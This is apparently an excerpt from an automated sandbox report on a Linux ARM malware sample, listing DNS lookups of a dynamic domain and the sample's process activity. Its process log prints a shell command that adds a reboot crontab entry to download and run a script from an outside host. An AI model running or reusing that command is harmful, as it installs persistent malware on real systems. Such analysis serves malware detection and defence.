                                                                                            Oct 26, 2024 19:45:42.028717041 CEST80.152.203.134192.168.2.130x620bNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:42.028717041 CEST80.152.203.134192.168.2.130x620bNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:42.028717041 CEST80.152.203.134192.168.2.130x620bNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:42.028717041 CEST80.152.203.134192.168.2.130x620bNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:42.028717041 CEST80.152.203.134192.168.2.130x620bNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:42.028717041 CEST80.152.203.134192.168.2.130x620bNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:47.721755981 CEST65.21.1.106192.168.2.130x1f9bNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:47.721755981 CEST65.21.1.106192.168.2.130x1f9bNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:47.721755981 CEST65.21.1.106192.168.2.130x1f9bNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:47.721755981 CEST65.21.1.106192.168.2.130x1f9bNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:47.721755981 CEST65.21.1.106192.168.2.130x1f9bNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:47.721755981 CEST65.21.1.106192.168.2.130x1f9bNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:47.721755981 CEST65.21.1.106192.168.2.130x1f9bNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:47.721755981 CEST65.21.1.106192.168.2.130x1f9bNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:47.721755981 CEST65.21.1.106192.168.2.130x1f9bNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:47.721755981 CEST65.21.1.106192.168.2.130x1f9bNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:47.721755981 CEST65.21.1.106192.168.2.130x1f9bNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:53.702656984 CEST194.36.144.87192.168.2.130x6fdfNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:53.702656984 CEST194.36.144.87192.168.2.130x6fdfNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:53.702656984 CEST194.36.144.87192.168.2.130x6fdfNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:53.702656984 CEST194.36.144.87192.168.2.130x6fdfNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:53.702656984 CEST194.36.144.87192.168.2.130x6fdfNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:53.702656984 CEST194.36.144.87192.168.2.130x6fdfNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:53.702656984 CEST194.36.144.87192.168.2.130x6fdfNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:53.702656984 CEST194.36.144.87192.168.2.130x6fdfNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:53.702656984 CEST194.36.144.87192.168.2.130x6fdfNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:53.702656984 CEST194.36.144.87192.168.2.130x6fdfNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:53.702656984 CEST194.36.144.87192.168.2.130x6fdfNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false

                                                                                            System Behavior

                                                                                            Start time (UTC):17:43:28
                                                                                            Start date (UTC):26/10/2024
                                                                                            Path:/tmp/arm5.elf
                                                                                            Arguments:/tmp/arm5.elf
                                                                                            File size:4956856 bytes
                                                                                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                            Start time (UTC):17:43:28
                                                                                            Start date (UTC):26/10/2024
                                                                                            Path:/tmp/arm5.elf
                                                                                            Arguments:-
                                                                                            File size:4956856 bytes
                                                                                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                            Start time (UTC):17:43:28
                                                                                            Start date (UTC):26/10/2024
                                                                                            Path:/bin/sh
                                                                                            Arguments:sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
                                                                                            File size:129816 bytes
                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                            Start time (UTC):17:43:28
                                                                                            Start date (UTC):26/10/2024
                                                                                            Path:/bin/sh
                                                                                            Arguments:-
                                                                                            File size:129816 bytes
                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                            Start time (UTC):17:43:28
                                                                                            Start date (UTC):26/10/2024
                                                                                            Path:/bin/sh
                                                                                            Arguments:-
                                                                                            File size:129816 bytes
                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                            Start time (UTC):17:43:28
                                                                                            Start date (UTC):26/10/2024
                                                                                            Path:/usr/bin/crontab
                                                                                            Arguments:crontab -l
                                                                                            File size:43720 bytes
                                                                                            MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                                            Start time (UTC):17:43:28
                                                                                            Start date (UTC):26/10/2024
                                                                                            Path:/bin/sh
                                                                                            Arguments:-
                                                                                            File size:129816 bytes
                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                            Start time (UTC):17:43:28
                                                                                            Start date (UTC):26/10/2024
                                                                                            Path:/usr/bin/crontab
                                                                                            Arguments:crontab -
                                                                                            File size:43720 bytes
                                                                                            MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                                            Start time (UTC):17:43:28
                                                                                            Start date (UTC):26/10/2024
                                                                                            Path:/tmp/arm5.elf
                                                                                            Arguments:-
                                                                                            File size:4956856 bytes
                                                                                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                            Start time (UTC):17:43:28
                                                                                            Start date (UTC):26/10/2024
                                                                                            Path:/tmp/arm5.elf
                                                                                            Arguments:-
                                                                                            File size:4956856 bytes
                                                                                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                            Start time (UTC):17:43:28
                                                                                            Start date (UTC):26/10/2024
                                                                                            Path:/tmp/arm5.elf
                                                                                            Arguments:-
                                                                                            File size:4956856 bytes
                                                                                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                            Start time (UTC):17:43:28
                                                                                            Start date (UTC):26/10/2024
                                                                                            Path:/tmp/arm5.elf
                                                                                            Arguments:-
                                                                                            File size:4956856 bytes
                                                                                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                            Start time (UTC):17:43:28
                                                                                            Start date (UTC):26/10/2024
                                                                                            Path:/tmp/arm5.elf
                                                                                            Arguments:-
                                                                                            File size:4956856 bytes
                                                                                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1